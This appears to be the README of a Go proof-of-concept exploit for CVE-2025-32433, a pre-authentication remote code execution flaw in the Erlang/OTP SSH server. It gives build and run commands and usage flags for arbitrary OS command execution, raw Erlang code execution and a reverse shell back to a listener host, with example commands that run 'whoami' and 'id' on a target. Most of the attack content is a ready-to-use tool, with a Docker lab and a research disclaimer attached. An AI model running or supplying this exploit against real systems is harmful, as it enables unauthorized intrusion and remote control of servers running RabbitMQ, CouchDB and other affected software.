## https://sploitus.com/exploit?id=C78DF89D-6017-51DA-A1CF-750A450D0B2E
Erlang/OTP SSH Unauthenticated Blind RCE (CVE-2025-32433) PoC
## ๐ Description
CVE-2025-32433 is a critical unauthenticated remote code execution vulnerability in Erlang/OTP's SSH server. Prior to the patched versions, the SSH daemon incorrectly processes channel messages before authentication is complete, allowing an attacker to open a channel and send `exec` requests without ever providing credentials. Any application embedding Erlang/OTP's SSH server (including Elixir, RabbitMQ, CouchDB, and others) is affected when the SSH port is exposed.
This Go PoC connects to a target SSH port, sends a crafted `SSH_MSG_CHANNEL_OPEN` followed by a `SSH_MSG_CHANNEL_REQUEST` exec payload โ entirely pre-authentication โ causing the remote Erlang node to execute arbitrary OS commands. Execution is **blind**: no command output is returned to the attacker.
**Affected versions:** Erlang/OTP [!NOTE]
> Requires [Go 1.21+](https://go.dev/dl/). No external dependencies โ uses only the Go standard library.
### OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433 cve-2025-32433.go
```
### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433.exe cve-2025-32433.go
```
### Install directly with Go
```bash
go install github.com/joshuavanderpoll/CVE-2025-32433@latest
```
### Run without installing
```bash
go run github.com/joshuavanderpoll/CVE-2025-32433@latest -host 192.168.1.100 -port 22
```
## โ๏ธ Usage
```
Usage of ./cve-2025-32433:
-host string
Target IP or hostname
-port int
SSH port (default: 22) (default 22)
-timeout int
Connection timeout in seconds (default: 5) (default 5)
-command string
Shell command to run on the target (wrapped in os:cmd)
-code string
Raw Erlang expression to execute on the target
-shell
Send an Erlang-native gen_tcp reverse shell
-lhost string
Listener IP for reverse shell (required with -shell)
-lport int
Listener port for reverse shell (default: 4444)
```
### Check if a target is vulnerable
```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222
```

### Command execution
```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222 -command 'whoami > /tmp/out2.txt'
```

### Reverse shell
The `-shell` flag sends a native Erlang `gen_tcp` reverse shell payload โ no bash or `/dev/tcp` required. Start a listener first, then send the exploit.
```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222 -shell -lhost host.docker.internal -lport 4444
```

### Code execution
The `-code` flag sends a raw Erlang expression directly โ no `bash -c` wrapper. Useful for pure Erlang ops or when bash isn't available on the target. Since execution is blind, write output to a file and retrieve it separately.
```bash
./cve-2025-32433 -host 127.0.0.1 -port 2222 -code 'file:write_file("/tmp/out.txt", os:cmd("id")).'
```

## ๐ Docker PoC
More details at [docker/DOCKER.md](/docker/DOCKER.md)
```bash
cd docker/
docker compose down
docker compose up -d
# You can test at -host 127.0.0.1 -port 2222
```
## ๐ต๐ผ References
- [Erlang/OTP Security Advisory](https://www.erlang.org/news/175)
- [NVD โ CVE-2025-32433](https://nvd.nist.gov/vuln/detail/CVE-2025-32433)
- [HackIndex](https://hackindex.io/vulnerabilities/CVE-2025-32433)
## ๐ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.